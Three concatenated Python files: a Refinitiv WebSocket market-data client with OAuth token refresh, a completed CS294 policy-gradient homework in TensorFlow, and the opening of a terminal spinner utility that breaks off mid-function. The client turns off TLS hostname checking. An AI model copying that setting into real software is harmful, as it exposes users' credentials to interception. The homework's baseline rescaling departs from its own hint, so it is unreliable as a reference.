retrieve MarketPrice content. A username and password are used to retrieve
this token.
"""
import sys
import time
import getopt
import requests
import socket
import json
import websocket
import threading
# Global Default Variables
app_id = '256'
auth_url = 'https://api.refinitiv.com:443/auth/oauth2/beta1/token'
hostname = ''
password = ''
position = ''
sts_token = ''
refresh_token = ''
user = ''
clientid = ''
port = '443'
client_secret = ''
scope = 'trapi'
ric = '/TRI.N'
service = 'ELEKTRON_DD'
view = []
no_streaming = False
# Global Variables
web_socket_app = None
web_socket_open = False
logged_in = False
def process_message(message_json):
""" Parse at high level and output JSON of message """
message_type = message_json['Type']
if message_type == "Refresh":
if 'Domain' in message_json:
message_domain = message_json['Domain']
if message_domain == "Login":
process_login_response(message_json)
elif message_type == "Ping":
pong_json = {'Type': 'Pong'}
web_socket_app.send(json.dumps(pong_json))
print("SENT:")
print(json.dumps(pong_json, sort_keys=True, indent=2, separators=(',', ':')))
def process_login_response(message_json):
""" Send item request """
global logged_in
if message_json['State']['Stream'] != "Open" or message_json['State']['Data'] != "Ok":
print("Login failed.")
sys.exit(1)
logged_in = True
send_market_price_request(ric)
def send_market_price_request(ric_name):
""" Create and send simple Market Price request """
mp_req_json = {
'ID': 2,
'Key': {
'Name': ric_name,
'Service': service
},
'Streaming': not no_streaming,
}
if view:
mp_req_json['View'] = view
web_socket_app.send(json.dumps(mp_req_json))
print("SENT:")
print(json.dumps(mp_req_json, sort_keys=True, indent=2, separators=(',', ':')))
def send_login_request(auth_token, is_refresh_token):
"""
Send login request with authentication token.
Used both for the initial login and subsequent reissues to update the authentication token
"""
login_json = {
'ID': 1,
'Domain': 'Login',
'Key': {
'NameType': 'AuthnToken',
'Elements': {
'ApplicationId': '',
'Position': '',
'AuthenticationToken': ''
}
}
}
login_json['Key']['Elements']['ApplicationId'] = app_id
login_json['Key']['Elements']['Position'] = position
login_json['Key']['Elements']['AuthenticationToken'] = auth_token
# If the token is a refresh token, this is not our first login attempt.
if is_refresh_token:
login_json['Refresh'] = False
web_socket_app.send(json.dumps(login_json))
print("SENT:")
print(json.dumps(login_json, sort_keys=True, indent=2, separators=(',', ':')))
def on_message(_, message):
""" Called when message received, parse message into JSON for processing """
print("RECEIVED: ")
message_json = json.loads(message)
print(json.dumps(message_json, sort_keys=True, indent=2, separators=(',', ':')))
for singleMsg in message_json:
process_message(singleMsg)
def on_error(_, error):
""" Called when websocket error has occurred """
print(error)
def on_close(_):
""" Called when websocket is closed """
global web_socket_open
web_socket_open = False
print("WebSocket Closed")
def on_open(_):
""" Called when handshake is complete and websocket is open, send login """
print("WebSocket successfully connected!")
global web_socket_open
web_socket_open = True
send_login_request(sts_token, False)
def get_sts_token(current_refresh_token, url=None):
"""
Retrieves an authentication token.
:param current_refresh_token: Refresh token retrieved from a previous authentication, used to retrieve a
subsequent access token. If not provided (i.e. on the initial authentication), the password is used.
"""
if url is None:
url = auth_url
if not current_refresh_token: # First time through, send password
if url.startswith('https'):
data = {'username': user, 'password': password, 'grant_type': 'password', 'takeExclusiveSignOnControl': True,
'scope': scope}
else:
data = {'username': user, 'password': password, 'client_id': clientid, 'grant_type': 'password', 'takeExclusiveSignOnControl': True,
'scope': scope}
print("Sending authentication request with password to", url, "...")
else: # Use the given refresh token
if url.startswith('https'):
data = {'username': user, 'refresh_token': current_refresh_token, 'grant_type': 'refresh_token'}
else:
data = {'username': user, 'client_id': clientid, 'refresh_token': current_refresh_token, 'grant_type': 'refresh_token'}
print("Sending authentication request with refresh token to", url, "...")
try:
if url.startswith('https'):
# Request with auth for https protocol
r = requests.post(url,
headers={'Accept': 'application/json'},
data=data,
auth=(clientid, client_secret),
verify=True,
allow_redirects=False)
else:
# Request without auth for non https protocol (e.g. http)
r = requests.post(url,
headers={'Accept': 'application/json'},
data=data,
verify=True,
allow_redirects=False)
except requests.exceptions.RequestException as e:
print('EDP-GW authentication exception failure:', e)
return None, None, None
if r.status_code == 200:
auth_json = r.json()
print("EDP-GW Authentication succeeded. RECEIVED:")
print(json.dumps(auth_json, sort_keys=True, indent=2, separators=(',', ':')))
return auth_json['access_token'], auth_json['refresh_token'], auth_json['expires_in']
elif r.status_code == 301 or r.status_code == 302 or r.status_code == 307 or r.status_code == 308:
# Perform URL redirect
print('EDP-GW authentication HTTP code:', r.status_code, r.reason)
new_host = r.headers['Location']
if new_host is not None:
print('Perform URL redirect to ', new_host)
return get_sts_token(current_refresh_token, new_host)
return None, None, None
elif r.status_code == 400 or r.status_code == 401:
# Retry with username and password
print('EDP-GW authentication HTTP code:', r.status_code, r.reason)
if current_refresh_token:
# Refresh token may have expired. Try using our password.
print('Retry with username and password')
return get_sts_token(None)
return None, None, None
elif r.status_code == 403 or r.status_code == 451:
# Stop retrying with the request
print('EDP-GW authentication HTTP code:', r.status_code, r.reason)
print('Stop retrying with the request')
return None, None, None
else:
# Retry the request to the API gateway
print('EDP-GW authentication HTTP code:', r.status_code, r.reason)
print('Retry the request to the API gateway')
return get_sts_token(current_refresh_token)
if __name__ == "__main__":
# Get command line parameters
try:
opts, args = getopt.getopt(sys.argv[1:], "", ["help", "hostname=", "port=", "app_id=", "user=", "clientid=", "password=",
"position=", "auth_url=", "scope=", "ric=", "service=", "view=", "no_streaming"])
except getopt.GetoptError:
print('Usage: market_price_edpgw_authentication.py [--hostname hostname] [--port port] [--app_id app_id] '
'[--user user] [--clientid clientid] [--password password] [--position position] [--auth_url auth_url] '
'[--scope scope] [--ric ric] [--service service] [--view view] [--no_streaming] [--help]')
sys.exit(2)
for opt, arg in opts:
if opt in "--help":
print('Usage: market_price_edpgw_authentication.py [--hostname hostname] [--port port] [--app_id app_id] '
'[--user user] [--clientid clientid] [--password password] [--position position] [--auth_url auth_url] '
'[--scope scope] [--ric ric] [--service service] [--view view] [--no_streaming] [--help]')
sys.exit(0)
elif opt in "--hostname":
hostname = arg
elif opt in "--port":
port = arg
elif opt in "--app_id":
app_id = arg
elif opt in "--user":
user = arg
elif opt in "--clientid":
clientid = arg
elif opt in "--password":
password = arg
elif opt in "--position":
position = arg
elif opt in "--auth_url":
auth_url = arg
elif opt in "--scope":
scope = arg
elif opt in "--ric":
ric = arg
elif opt in "--service":
service = arg
elif opt in "--view":
view = arg.split(',')
elif opt in "--no_streaming":
no_streaming = True
if user == '' or password == '' or hostname == '' or clientid == '':
print("user, clientid, password, and hostname are required options")
sys.exit(2)
if position == '':
# Populate position if possible
try:
position_host = socket.gethostname()
position = socket.gethostbyname(position_host) + "/" + position_host
except socket.gaierror:
position = "127.0.0.1/net"
sts_token, refresh_token, expire_time = get_sts_token(None)
if not sts_token:
sys.exit(1)
# Start websocket handshake
ws_address = "wss://{}:{}/WebSocket".format(hostname, port)
print("Connecting to WebSocket " + ws_address + " ...")
web_socket_app = websocket.WebSocketApp(ws_address, on_message=on_message,
on_error=on_error,
on_close=on_close,
subprotocols=['tr_json2'])
web_socket_app.on_open = on_open
# Event loop
wst = threading.Thread(target=web_socket_app.run_forever, kwargs={'sslopt': {'check_hostname': False}})
wst.start()
try:
while True:
# Give 30 seconds to obtain the new security token and send reissue
if int(expire_time) > 30:
time.sleep(int(expire_time) - 30)
else:
# Fail the refresh since value too small
sys.exit(1)
sts_token, refresh_token, expire_time = get_sts_token(refresh_token)
if not sts_token:
sys.exit(1)
# Update token.
if logged_in:
send_login_request(sts_token, True)
except KeyboardInterrupt:
web_socket_app.close()
|
train_pg_f18.py
|
"""
Original code from John Schulman for CS294 Deep Reinforcement Learning Spring 2017
Adapted for CS294-112 Fall 2017 by Abhishek Gupta and Joshua Achiam
Adapted for CS294-112 Fall 2018 by Michael Chang and Soroush Nasiriany
"""
import numpy as np
import tensorflow as tf
import gym
import logz
import os
import time
import inspect
from multiprocessing import Process
#============================================================================================#
# Utilities
#============================================================================================#
#========================================================================================#
# ----------PROBLEM 2----------
#========================================================================================#
def build_mlp(input_placeholder, output_size, scope, n_layers, size, activation=tf.tanh, output_activation=None):
"""
Builds a feedforward neural network
arguments:
input_placeholder: placeholder variable for the state (batch_size, input_size)
output_size: size of the output layer
scope: variable scope of the network
n_layers: number of hidden layers
size: dimension of the hidden layer
activation: activation of the hidden layers
output_activation: activation of the output layer
returns:
output placeholder of the network (the result of a forward pass)
Hint: use tf.layers.dense
"""
# YOUR CODE HERE
with tf.variable_scope(scope):
net = input_placeholder
for i in range(n_layers):
net = tf.layers.dense(net, size, activation, name='dense{}'.format(i))
output_placeholder = tf.layers.dense(net, output_size, output_activation)
return output_placeholder
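# Illustrative sketch (not part of the assignment code): a 2-layer, 64-unit policy
# network for an 8-dimensional observation space and 4 discrete actions.
#
#   sy_ob_no = tf.placeholder(shape=[None, 8], dtype=tf.float32)
#   sy_logits_na = build_mlp(sy_ob_no, output_size=4, scope='policy', n_layers=2, size=64)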
def pathlength(path):
return len(path["reward"])
def setup_logger(logdir, locals_):
# Configure output directory for logging
logz.configure_output_dir(logdir)
# Log experimental parameters
args = inspect.getargspec(train_PG)[0]
params = {k: locals_[k] if k in locals_ else None for k in args}
logz.save_params(params)
#============================================================================================#
# Policy Gradient
#============================================================================================#
class Agent(object):
def __init__(self, computation_graph_args, sample_trajectory_args, estimate_return_args):
super(Agent, self).__init__()
self.ob_dim = computation_graph_args['ob_dim']
self.ac_dim = computation_graph_args['ac_dim']
self.discrete = computation_graph_args['discrete']
self.size = computation_graph_args['size']
self.n_layers = computation_graph_args['n_layers']
self.learning_rate = computation_graph_args['learning_rate']
self.animate = sample_trajectory_args['animate']
self.max_path_length = sample_trajectory_args['max_path_length']
self.min_timesteps_per_batch = sample_trajectory_args['min_timesteps_per_batch']
self.gamma = estimate_return_args['gamma']
self.reward_to_go = estimate_return_args['reward_to_go']
self.nn_baseline = estimate_return_args['nn_baseline']
self.normalize_advantages = estimate_return_args['normalize_advantages']
def init_tf_sess(self):
tf_config = tf.ConfigProto(inter_op_parallelism_threads=1, intra_op_parallelism_threads=1)
tf_config.gpu_options.allow_growth = True # pylint: disable=E1101
tf_config.gpu_options.visible_device_list = '0' # pylint: disable=E1101
self.sess = tf.Session(config=tf_config)
self.sess.__enter__() # equivalent to `with self.sess:`
tf.global_variables_initializer().run() #pylint: disable=E1101
#========================================================================================#
# ----------PROBLEM 2----------
#========================================================================================#
def define_placeholders(self):
"""
Placeholders for batch observations / actions / advantages in the policy gradient
loss function.
See Agent.build_computation_graph for notation
returns:
sy_ob_no: placeholder for observations
sy_ac_na: placeholder for actions
sy_adv_n: placeholder for advantages
"""
sy_ob_no = tf.placeholder(shape=[None, self.ob_dim], name="ob", dtype=tf.float32)
if self.discrete:
sy_ac_na = tf.placeholder(shape=[None], name="ac", dtype=tf.int32)
else:
sy_ac_na = tf.placeholder(shape=[None, self.ac_dim], name="ac", dtype=tf.float32)
# YOUR CODE HERE
sy_adv_n = tf.placeholder(shape=[None], name='adv', dtype=tf.float32)
return sy_ob_no, sy_ac_na, sy_adv_n
#========================================================================================#
# ----------PROBLEM 2----------
#========================================================================================#
def policy_forward_pass(self, sy_ob_no):
""" Constructs the symbolic operation for the policy network outputs,
which are the parameters of the policy distribution p(a|s)
arguments:
sy_ob_no: (batch_size, self.ob_dim)
returns:
the parameters of the policy.
if discrete, the parameters are the logits of a categorical distribution
over the actions
sy_logits_na: (batch_size, self.ac_dim)
if continuous, the parameters are a tuple (mean, log_std) of a Gaussian
distribution over actions. log_std should just be a trainable
variable, not a network output.
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (self.ac_dim,)
Hint: use the 'build_mlp' function to output the logits (in the discrete case)
and the mean (in the continuous case).
Pass in self.n_layers for the 'n_layers' argument, and
pass in self.size for the 'size' argument.
"""
if self.discrete:
# YOUR_CODE_HERE
sy_logits_na = build_mlp(sy_ob_no, self.ac_dim,
"model", self.n_layers, self.size, activation=tf.tanh, output_activation=None)
return sy_logits_na
else:
# YOUR_CODE_HERE
sy_mean = build_mlp(sy_ob_no, self.ac_dim,
"model", self.n_layers, self.size, activation=tf.tanh, output_activation=None)
sy_logstd = tf.Variable(tf.zeros([self.ac_dim]), name='logstd', dtype=tf.float32)  # one log-std per action dimension, per the docstring
return (sy_mean, sy_logstd)
#========================================================================================#
# ----------PROBLEM 2----------
#========================================================================================#
def sample_action(self, policy_parameters):
""" Constructs a symbolic operation for stochastically sampling from the policy
distribution
arguments:
policy_parameters
if discrete: logits of a categorical distribution over actions
sy_logits_na: (batch_size, self.ac_dim)
if continuous: (mean, log_std) of a Gaussian distribution over actions
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (self.ac_dim,)
returns:
sy_sampled_ac:
if discrete: (batch_size,)
if continuous: (batch_size, self.ac_dim)
Hint: for the continuous case, use the reparameterization trick:
The output from a Gaussian distribution with mean 'mu' and std 'sigma' is
mu + sigma * z, z ~ N(0, I)
This reduces the problem to just sampling z. (Hint: use tf.random_normal!)
"""
if self.discrete:
sy_logits_na = policy_parameters
# YOUR_CODE_HERE
sy_sampled_ac = tf.squeeze(tf.multinomial(sy_logits_na,1), axis=1)
else:
sy_mean, sy_logstd = policy_parameters
# YOUR_CODE_HERE
sy_sampled_ac = sy_mean + tf.random_normal(tf.shape(sy_mean))*tf.exp(sy_logstd)
return sy_sampled_ac
#========================================================================================#
# ----------PROBLEM 2----------
#========================================================================================#
def get_log_prob(self, policy_parameters, sy_ac_na):
""" Constructs a symbolic operation for computing the log probability of a set of actions
that were actually taken according to the policy
arguments:
policy_parameters
if discrete: logits of a categorical distribution over actions
sy_logits_na: (batch_size, self.ac_dim)
if continuous: (mean, log_std) of a Gaussian distribution over actions
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (self.ac_dim,)
sy_ac_na:
if discrete: (batch_size,)
if continuous: (batch_size, self.ac_dim)
returns:
sy_logprob_n: (batch_size)
Hint:
For the discrete case, use the log probability under a categorical distribution.
For the continuous case, use the log probability under a multivariate gaussian.
"""
if self.discrete:
sy_logits_na = policy_parameters
# YOUR_CODE_HERE
logp_all = tf.nn.log_softmax(sy_logits_na)
sy_logprob_n = tf.reduce_sum(tf.one_hot(sy_ac_na, depth=self.ac_dim) * logp_all, axis=1)
else:
sy_mean, sy_logstd = policy_parameters
# YOUR_CODE_HERE
EPS = 1e-8
sy_logprob_n = -0.5 * (((sy_ac_na-sy_mean)/(tf.exp(sy_logstd)+EPS))**2 + 2*sy_logstd + np.log(2*np.pi))
sy_logprob_n = tf.reduce_sum(sy_logprob_n, axis=1)
return sy_logprob_n
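# For reference (illustrative note): the diagonal-Gaussian log-density computed above is
#   log p(a|s) = -1/2 * sum_i [ ((a_i - mu_i) / sigma_i)^2 + 2*log(sigma_i) + log(2*pi) ]
# with sigma_i = exp(sy_logstd_i); the EPS term only guards against division by zero.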
def build_computation_graph(self):
"""
Notes on notation:
Symbolic variables have the prefix sy_, to distinguish them from the numerical values
that are computed later in the function
Prefixes and suffixes:
ob - observation
ac - action
_no - this tensor should have shape (batch size /n/, observation dim)
_na - this tensor should have shape (batch size /n/, action dim)
_n - this tensor should have shape (batch size /n/)
Note: batch size /n/ is defined at runtime, and until then, the shape for that axis
is None
----------------------------------------------------------------------------------
loss: a function of self.sy_logprob_n and self.sy_adv_n that we will differentiate
to get the policy gradient.
"""
self.sy_ob_no, self.sy_ac_na, self.sy_adv_n = self.define_placeholders()
# The policy takes in an observation and produces a distribution over the action space
self.policy_parameters = self.policy_forward_pass(self.sy_ob_no)
# We can sample actions from this action distribution.
# This will be called in Agent.sample_trajectory() where we generate a rollout.
self.sy_sampled_ac = self.sample_action(self.policy_parameters)
# We can also compute the logprob of the actions that were actually taken by the policy
# This is used in the loss function.
self.sy_logprob_n = self.get_log_prob(self.policy_parameters, self.sy_ac_na)
#========================================================================================#
# ----------PROBLEM 2----------
# Loss Function and Training Operation
#========================================================================================#
loss = -tf.reduce_sum(self.sy_logprob_n * self.sy_adv_n) # YOUR CODE HERE
self.update_op = tf.train.AdamOptimizer(self.learning_rate).minimize(loss)
#========================================================================================#
# ----------PROBLEM 6----------
# Optional Baseline
#
# Define placeholders for targets, a loss function and an update op for fitting a
# neural network baseline. These will be used to fit the neural network baseline.
#========================================================================================#
if self.nn_baseline:
self.baseline_prediction = tf.squeeze(build_mlp(
self.sy_ob_no,
1,
"nn_baseline",
n_layers=self.n_layers,
size=self.size))
# YOUR_CODE_HERE
self.sy_target_n = tf.placeholder(shape=[None, ], name='baseline', dtype=tf.float32)
baseline_loss = tf.losses.mean_squared_error(self.sy_target_n, self.baseline_prediction)
self.baseline_update_op = tf.train.AdamOptimizer(self.learning_rate).minimize(baseline_loss)
def sample_trajectories(self, itr, env):
# Collect paths until we have enough timesteps
timesteps_this_batch = 0
paths = []
while True:
animate_this_episode=(len(paths)==0 and (itr % 10 == 0) and self.animate)
path = self.sample_trajectory(env, animate_this_episode)
paths.append(path)
timesteps_this_batch += pathlength(path)
if timesteps_this_batch > self.min_timesteps_per_batch:
break
return paths, timesteps_this_batch
def sample_trajectory(self, env, animate_this_episode):
ob = env.reset()
obs, acs, rewards = [], [], []
steps = 0
while True:
if animate_this_episode:
env.render()
time.sleep(0.1)
obs.append(ob)
#====================================================================================#
# ----------PROBLEM 3----------
#====================================================================================#
ac = self.sess.run(self.sy_sampled_ac, feed_dict={self.sy_ob_no:ob.reshape(-1,self.ob_dim)})
ac = ac[0]
acs.append(ac)
ob, rew, done, _ = env.step(ac)
rewards.append(rew)
steps += 1
if done or steps > self.max_path_length:
break
path = {"observation" : np.array(obs, dtype=np.float32),
"reward" : np.array(rewards, dtype=np.float32),
"action" : np.array(acs, dtype=np.float32)}
return path
#====================================================================================#
# ----------PROBLEM 3----------
#====================================================================================#
def sum_of_rewards(self, re_n):
"""
Monte Carlo estimation of the Q function.
let sum_of_path_lengths be the sum of the lengths of the paths sampled from
Agent.sample_trajectories
let num_paths be the number of paths sampled from Agent.sample_trajectories
arguments:
re_n: length: num_paths. Each element in re_n is a numpy array
containing the rewards for the particular path
returns:
q_n: shape: (sum_of_path_lengths). A single vector for the estimated q values
whose length is the sum of the lengths of the paths
----------------------------------------------------------------------------------
Your code should construct numpy arrays for Q-values which will be used to compute
advantages (which will in turn be fed to the placeholder you defined in
Agent.define_placeholders).
Recall that the expression for the policy gradient PG is
PG = E_{tau} [sum_{t=0}^T grad log pi(a_t|s_t) * (Q_t - b_t )]
where
tau=(s_0, a_0, ...) is a trajectory,
Q_t is the Q-value at time t, Q^{pi}(s_t, a_t),
and b_t is a baseline which may depend on s_t.
You will write code for two cases, controlled by the flag 'reward_to_go':
Case 1: trajectory-based PG
(reward_to_go = False)
Instead of Q^{pi}(s_t, a_t), we use the total discounted reward summed over
entire trajectory (regardless of which time step the Q-value should be for).
For this case, the policy gradient estimator is
E_{tau} [sum_{t=0}^T grad log pi(a_t|s_t) * Ret(tau)]
where
Ret(tau) = sum_{t'=0}^T gamma^t' r_{t'}.
Thus, you should compute
Q_t = Ret(tau)
Case 2: reward-to-go PG
(reward_to_go = True)
Here, you estimate Q^{pi}(s_t, a_t) by the discounted sum of rewards starting
from time step t. Thus, you should compute
Q_t = sum_{t'=t}^T gamma^(t'-t) * r_{t'}
Store the Q-values for all timesteps and all trajectories in a variable 'q_n',
like the 'ob_no' and 'ac_na' above.
"""
# YOUR_CODE_HERE
reward_list = []
if self.reward_to_go:
for r in re_n:
r_reversed = np.flip(r)
t_sum = 0
t_r_list = []
for i in range(len(r_reversed)):
t_sum = r_reversed[i] + self.gamma*t_sum
t_r_list.append(t_sum)
list.reverse(t_r_list)
reward_list.extend(t_r_list)
else:
for r in re_n:
t_sum = 0
for i in range(len(r)):
t_sum += self.gamma**i * r[i]
reward_list += [t_sum]*len(r)
return np.array(reward_list)
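# Worked example (illustrative): re_n = [np.array([1., 1., 1.])], gamma = 0.5
#   reward_to_go=True  -> q_n = [1.75, 1.5, 1.0]    (discounted tail sums)
#   reward_to_go=False -> q_n = [1.75, 1.75, 1.75]  (full discounted return, repeated)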
def compute_advantage(self, ob_no, q_n):
"""
Computes advantages by (possibly) subtracting a baseline from the estimated Q values
let sum_of_path_lengths be the sum of the lengths of the paths sampled from
Agent.sample_trajectories
let num_paths be the number of paths sampled from Agent.sample_trajectories
arguments:
ob_no: shape: (sum_of_path_lengths, ob_dim)
q_n: shape: (sum_of_path_lengths). A single vector for the estimated q values
whose length is the sum of the lengths of the paths
returns:
adv_n: shape: (sum_of_path_lengths). A single vector for the estimated
advantages whose length is the sum of the lengths of the paths
"""
#====================================================================================#
# ----------PROBLEM 6----------
# Computing Baselines
#====================================================================================#
if self.nn_baseline:
# If nn_baseline is True, use your neural network to predict reward-to-go
# at each timestep for each trajectory, and save the result in a variable 'b_n'
# like 'ob_no', 'ac_na', and 'q_n'.
#
# Hint #bl1: rescale the output from the nn_baseline to match the statistics
# (mean and std) of the current batch of Q-values. (Goes with Hint
# #bl2 in Agent.update_parameters.)
b_n = self.sess.run(self.baseline_prediction, feed_dict={self.sy_ob_no:ob_no.reshape(-1,self.ob_dim)})
b_n_mean = b_n.mean()
b_n_std = b_n.std()
b_n = (b_n - b_n_mean)/b_n_std
adv_n = q_n - b_n
else:
adv_n = q_n.copy()
return adv_n
def estimate_return(self, ob_no, re_n):
"""
Estimates the returns over a set of trajectories.
let sum_of_path_lengths be the sum of the lengths of the paths sampled from
Agent.sample_trajectories
let num_paths be the number of paths sampled from Agent.sample_trajectories
arguments:
ob_no: shape: (sum_of_path_lengths, ob_dim)
re_n: length: num_paths. Each element in re_n is a numpy array
containing the rewards for the particular path
returns:
q_n: shape: (sum_of_path_lengths). A single vector for the estimated q values
whose length is the sum of the lengths of the paths
adv_n: shape: (sum_of_path_lengths). A single vector for the estimated
advantages whose length is the sum of the lengths of the paths
"""
q_n = self.sum_of_rewards(re_n)
adv_n = self.compute_advantage(ob_no, q_n)
#====================================================================================#
# ----------PROBLEM 3----------
# Advantage Normalization
#====================================================================================#
if self.normalize_advantages:
# On the next line, implement a trick which is known empirically to reduce variance
# in policy gradient methods: normalize adv_n to have mean zero and std=1.
adv_mean = adv_n.mean()
adv_std = adv_n.std()
adv_n = (adv_n - adv_mean)/adv_std
return q_n, adv_n
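# Worked example (illustrative): adv_n = [1., 2., 3.] has mean 2 and (population)
# std ~0.8165, so normalization yields approximately [-1.2247, 0., 1.2247].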
def update_parameters(self, ob_no, ac_na, q_n, adv_n):
"""
Update the parameters of the policy and (possibly) the neural network baseline,
which is trained to approximate the value function.
arguments:
ob_no: shape: (sum_of_path_lengths, ob_dim)
ac_na: shape: (sum_of_path_lengths).
q_n: shape: (sum_of_path_lengths). A single vector for the estimated q values
whose length is the sum of the lengths of the paths
adv_n: shape: (sum_of_path_lengths). A single vector for the estimated
advantages whose length is the sum of the lengths of the paths
returns:
nothing
"""
#====================================================================================#
# ----------PROBLEM 6----------
# Optimizing Neural Network Baseline
#====================================================================================#
if self.nn_baseline:
# If a neural network baseline is used, set up the targets and the inputs for the
# baseline.
#
# Fit it to the current batch in order to use for the next iteration. Use the
# baseline_update_op you defined earlier.
#
# Hint #bl2: Instead of trying to target raw Q-values directly, rescale the
# targets to have mean zero and std=1. (Goes with Hint #bl1 in
# Agent.compute_advantage.)
# YOUR_CODE_HERE
q_n_mean = q_n.mean()
q_n_std = q_n.std()
target_n = (q_n - q_n_mean)/q_n_std
_ = self.sess.run(self.baseline_update_op, feed_dict = {self.sy_target_n : target_n, self.sy_ob_no : ob_no})
#====================================================================================#
# ----------PROBLEM 3----------
# Performing the Policy Update
#====================================================================================#
# Call the update operation necessary to perform the policy gradient update based on
# the current batch of rollouts.
#
# For debug purposes, you may wish to save the value of the loss function before
# and after an update, and then log them below.
# YOUR_CODE_HERE
self.sess.run(self.update_op, feed_dict={self.sy_ob_no:ob_no, self.sy_ac_na:ac_na, self.sy_adv_n:adv_n})
def train_PG(
exp_name,
env_name,
n_iter,
gamma,
min_timesteps_per_batch,
max_path_length,
learning_rate,
reward_to_go,
animate,
logdir,
normalize_advantages,
nn_baseline,
seed,
n_layers,
size):
start = time.time()
#========================================================================================#
# Set Up Logger
#========================================================================================#
setup_logger(logdir, locals())
#========================================================================================#
# Set Up Env
#========================================================================================#
# Make the gym environment
env = gym.make(env_name)
# Set random seeds
tf.set_random_seed(seed)
np.random.seed(seed)
env.seed(seed)
# Maximum length for episodes
max_path_length = max_path_length or env.spec.max_episode_steps
# Is this env continuous, or self.discrete?
discrete = isinstance(env.action_space, gym.spaces.Discrete)
# Observation and action sizes
ob_dim = env.observation_space.shape[0]
ac_dim = env.action_space.n if discrete else env.action_space.shape[0]
#========================================================================================#
# Initialize Agent
#========================================================================================#
computation_graph_args = {
'n_layers': n_layers,
'ob_dim': ob_dim,
'ac_dim': ac_dim,
'discrete': discrete,
'size': size,
'learning_rate': learning_rate,
}
sample_trajectory_args = {
'animate': animate,
'max_path_length': max_path_length,
'min_timesteps_per_batch': min_timesteps_per_batch,
}
estimate_return_args = {
'gamma': gamma,
'reward_to_go': reward_to_go,
'nn_baseline': nn_baseline,
'normalize_advantages': normalize_advantages,
}
agent = Agent(computation_graph_args, sample_trajectory_args, estimate_return_args)
# build computation graph
agent.build_computation_graph()
# tensorflow: config, session, variable initialization
agent.init_tf_sess()
#========================================================================================#
# Training Loop
#========================================================================================#
total_timesteps = 0
for itr in range(n_iter):
print("********** Iteration %i ************"%itr)
paths, timesteps_this_batch = agent.sample_trajectories(itr, env)
total_timesteps += timesteps_this_batch
# Build arrays for observation, action for the policy gradient update by concatenating
# across paths
ob_no = np.concatenate([path["observation"] for path in paths])
ac_na = np.concatenate([path["action"] for path in paths])
re_n = [path["reward"] for path in paths]
q_n, adv_n = agent.estimate_return(ob_no, re_n)
agent.update_parameters(ob_no, ac_na, q_n, adv_n)
# Log diagnostics
returns = [path["reward"].sum() for path in paths]
ep_lengths = [pathlength(path) for path in paths]
logz.log_tabular("Time", time.time() - start)
logz.log_tabular("Iteration", itr)
logz.log_tabular("AverageReturn", np.mean(returns))
logz.log_tabular("StdReturn", np.std(returns))
logz.log_tabular("MaxReturn", np.max(returns))
logz.log_tabular("MinReturn", np.min(returns))
logz.log_tabular("EpLenMean", np.mean(ep_lengths))
logz.log_tabular("EpLenStd", np.std(ep_lengths))
logz.log_tabular("TimestepsThisBatch", timesteps_this_batch)
logz.log_tabular("TimestepsSoFar", total_timesteps)
logz.dump_tabular()
logz.pickle_tf_vars()
def main():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('env_name', type=str)
parser.add_argument('--exp_name', type=str, default='vpg')
parser.add_argument('--render', action='store_true')
parser.add_argument('--discount', type=float, default=1.0)
parser.add_argument('--n_iter', '-n', type=int, default=100)
parser.add_argument('--batch_size', '-b', type=int, default=1000)
parser.add_argument('--ep_len', '-ep', type=float, default=-1.)
parser.add_argument('--learning_rate', '-lr', type=float, default=5e-3)
parser.add_argument('--reward_to_go', '-rtg', action='store_true')
parser.add_argument('--dont_normalize_advantages', '-dna', action='store_true')
parser.add_argument('--nn_baseline', '-bl', action='store_true')
parser.add_argument('--seed', type=int, default=1)
parser.add_argument('--n_experiments', '-e', type=int, default=1)
parser.add_argument('--n_layers', '-l', type=int, default=2)
parser.add_argument('--size', '-s', type=int, default=64)
args = parser.parse_args()
if not(os.path.exists('data')):
os.makedirs('data')
logdir = args.exp_name + '_' + args.env_name + '_' + time.strftime("%d-%m-%Y_%H-%M-%S")
logdir = os.path.join('data', logdir)
if not(os.path.exists(logdir)):
os.makedirs(logdir)
max_path_length = args.ep_len if args.ep_len > 0 else None
processes = []
for e in range(args.n_experiments):
seed = args.seed + 10*e
print('Running experiment with seed %d'%seed)
def train_func():
train_PG(
exp_name=args.exp_name,
env_name=args.env_name,
n_iter=args.n_iter,
gamma=args.discount,
min_timesteps_per_batch=args.batch_size,
max_path_length=max_path_length,
learning_rate=args.learning_rate,
reward_to_go=args.reward_to_go,
animate=args.render,
logdir=os.path.join(logdir,'%d'%seed),
normalize_advantages=not(args.dont_normalize_advantages),
nn_baseline=args.nn_baseline,
seed=seed,
n_layers=args.n_layers,
size=args.size
)
# Awkward hacky process runs, because Tensorflow does not like
# repeatedly calling train_PG in the same thread.
p = Process(target=train_func, args=tuple())
p.start()
processes.append(p)
# if you uncomment the line below, the loop will block
# until this process finishes
# p.join()
for p in processes:
p.join()
if __name__ == "__main__":
main()
|
cmdanime.py
|
#!/usr/bin/env python3
# fileencoding=utf-8
'''
cmdanime.py
~~~~~~~~~~~
cmdanime.py provides command-line animation. When you start a long-running calculation in Python
and there is no output on the command line, it is hard to tell whether the program is actually running.
In that case, cmdanime.CmdAnimation shows an animation on the command line.
.. code-block:: python
from easyutil import CmdAnimation
## For Command Line Animation.
anm = CmdAnimation()
anm.start()
# Your function here.
anm.end()
.. autoclass:: easyutil.Signal
:members:
.. autoclass:: easyutil.CmdAnimation
:members:
'''
import os
import sys
import time
import threading
import itertools
from easyutil import estring as es
class easyThread(threading.Thread):
def __init__(self, func, args):
threading.Thread.__init__(self)
self.value = 0
self.func = func
self.args = args
def run(self):
self.value = self.func(self.args[1])
def get_value(self):
return self.value
class Signal:
go = True
class CmdAnimation:
'''
.. code-block:: python
:emphasize-lines: 3,5
from easyutil import CmdAnimation
anm = CmdAnimation()
anm.start()
# Your function here.
anm.end()
'''
def __init__(self, anim_type='spin', filename='', size=0, msg='', msg2=''):
"""
:anim_type[str]: [spin, progress]
:filename[str]: for showing progress bar.
:size[int]: full size of the file in bytes, for showing progress bar.
"""
self.full_size = size
self.signal = Signal()
self.duration_time = 0
self.filename = filename
self.types = {"spin": self._spin, "progress": self._progress}
self.func = self.types[anim_type]
self.msg = msg
self.msg2 = msg2
self.msg2_size = 20
def start(self):
'''
start() starts animation.
'''
self.anim = threading.Thread(target=self.func, args=(self.msg, self.msg2, self.signal))
self.anim.start()
def _spin(self, msg, msg2, signal):
# Show Spin.
spins = '|/-\\'
